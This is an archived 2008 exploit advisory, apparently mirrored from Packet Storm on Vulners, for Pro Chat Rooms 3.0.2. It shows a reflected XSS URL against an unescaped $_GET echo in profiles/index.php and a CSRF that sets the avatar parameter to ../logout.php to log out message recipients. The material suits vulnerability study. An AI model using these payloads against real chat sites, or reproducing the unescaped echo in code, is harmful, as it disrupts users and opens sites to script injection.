Lucene search
K

Pro Chat Rooms 3.0.2 XSS / XSRF

🗓️ 10 Dec 2008 00:00:00Reported by ZynbERType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Pro Chat Rooms v3.0.2 XSS/CSRF vulnerabilities in profiles and message functionality. Exploits allow XSS in profiles and CSRF to change avatar triggering unwanted actions. Educational purpose only

Code
`#########################################################################  
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties  
#########################################################################  
  
  
## AUTHOR : ZynbER  
## MAiL : ZynbER[at]Gmail[dot]com  
## HOME : NoWhere  
  
  
## Script WebSite : http://www.prochatrooms.com  
  
## Version : Pro Chat Rooms Version 3.0.2  
  
  
## EXPLOITS :  
  
-==XSS==-  
  
http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED  
  
Vulnerable code in "/profiles/index.php"  
  
  
<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>  
  
  
-==CSRF==-  
  
When a user sends a message in public room or in pm to onther user ; there is a parameter  
to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message  
  
The JS sending function; here u can see all params needed to POST a message to user/room  
  
//Add a message to the chat server.  
function sendChatText() {  
  
if(!document.getElementById('txt_message').value) {  
alert("You have not entered a message ");  
return;  
}  
if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {  
alert("You cannot whisper to yourself! ");  
return;  
}  
if (sendReq.readyState == 4 || sendReq.readyState == 0) {  
sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);  
sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');  
sendReq.onreadystatechange = handleSendChat;   
var param = 'message=' + document.getElementById('txt_message').value;  
param += '&name=' + chat_user;  
param += '&nid=' + chat_userid;  
param += '&chat=1';  
param += '&room=' + room;  
param += '&whisper=' + document.getElementById('whisper').value;  
param += '&fontface=' + document.getElementById('font_face').value;  
param += '&fontcolor=' + document.getElementById('font_color').value;  
param += '&fontheight=' + document.getElementById('font_height').value;  
param += '&fontstyle=' + document.getElementById('font_style').value;  
param += '&avatar=' + document.getElementById('user_avatar').value;  
sendReq.send(param);  
document.getElementById('txt_message').value = '';  
}   
}  
  
  
Exploit Example:  
  
default ==> http://www.yoursite.com/[path]/Avatars/online.gif  
  
  
Your mallecious CSRF param; avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php  
  
  
in this example the user will logout when he recieves ur message; in a public room all users will  
be loged out from the room ;)  
  
  
  
  
## Note:   
  
This infos are for educational purpose only;   
I'm not responsable for any damage caused...  
  
  
  
## GREETZ : Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka  
  
-=== Marequin est fière de l'être ===-  
  
#########################################################################  
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties  
#########################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Dec 2008 00:00Current
0.5Low risk
Vulners AI Score0.5
16